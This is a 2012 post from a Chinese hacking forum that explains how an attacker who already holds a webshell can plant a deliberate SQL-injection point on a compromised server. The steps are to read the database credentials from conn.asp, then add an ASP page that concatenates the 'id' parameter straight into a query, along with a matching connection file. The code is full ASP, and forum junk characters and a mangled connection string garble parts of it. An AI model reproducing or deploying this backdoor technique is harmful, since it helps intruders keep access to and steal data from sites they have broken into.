找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1868|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
+ k' N- N4 K8 Q' ~' e
( S( n  }4 Y! M9 W今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息7 k7 Q& g" y7 h# q
* m; g2 Y& m2 N& M8 T# K+ O$ M
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!8 N$ q/ q) m% R5 k% q
& I/ A7 p; r3 h+ N) z/ R
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
3 G& r+ N* M, d) d8 @; @8 E0 t. }3 F
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表5 Q7 a' N! q  Z3 ^+ I

& ~" m( `, O; Q" [# ^因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
' K- n2 X9 b' Z: [& z5 f5 H. b! w- N- z: ?# r" G. P1 [
程序代码# V, e! c1 K  ~$ L
<!--#include file="xx.asp"-->) J+ `" Y+ N3 U$ F% \
<%2 u4 s# E+ }6 ?& ~1 b
set rs=server.createobject("ADODB.recordset")
+ a* j0 I9 ~- y$ Tid = request("id")/ N3 c6 D3 X9 t: c' P& L! A! {$ J
strSQL = "select * from admin where id=" & id
& W# M: v. G- a2 e! A& K, J0 {rs.open strSQL,conn,1,33 J# S* C9 j/ i7 Z& @8 n! N
rs.close
0 a1 d1 \2 B! {: P$ u% u: b% X%>
9 A. T" t$ w) y# N8 d! b! g9 {4 X+ {
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在' d2 h, k& c6 T% F
8 W/ T! Z, Q8 C- Z. s3 v. m
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
; I1 p* N7 G# I% V. \& ?4 p0 D# Z
, o' D0 v6 b0 u6 l" q3 T然后就要构造一个连接数据库的文件了,代码如下:
1 a5 I$ d$ N7 S7 z4 K' p; ?/ t1 {程序代码
* a( Y' [& P& m# B, M1 R<%        
1 h: o& k1 g7 C( i# ~. ^) f, R  bstrSQLServerName = "000.000.000.000"     '服务器名称或地址
/ j* N, k" {+ OstrSQLDBUserName = "sqlname"         '数据库帐号
: \: O$ ^, g) w2 H9 ~. F5 T6 HstrSQLDBPassword = "sqlpass"         '数据库密码! Z& b* q; q, G: [$ n0 G
strSQLDBName = "sqldataname"           '数据库名称. z8 L) b% Y) e' p, Z
Set conn = Server.CreateObject("ADODB.Connection")
# M% r2 A, I0 ]) @$ _strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
4 X. I) W0 C4 dconn.open strCon
7 c; K* |  t( e2 ]/ f9 H%>% }' m) G, b0 o
$ ?  G" u, ]2 u- p0 v
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,7 `) u. v; {, _  W; l" m! h

! B5 x! K$ S/ x& n; i+ P) [就这样,正常情况下,就OK了,伪造成功……+ q4 W/ U0 p7 m5 M. _' v& g
3 G" K2 R: b- J7 p1 v
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表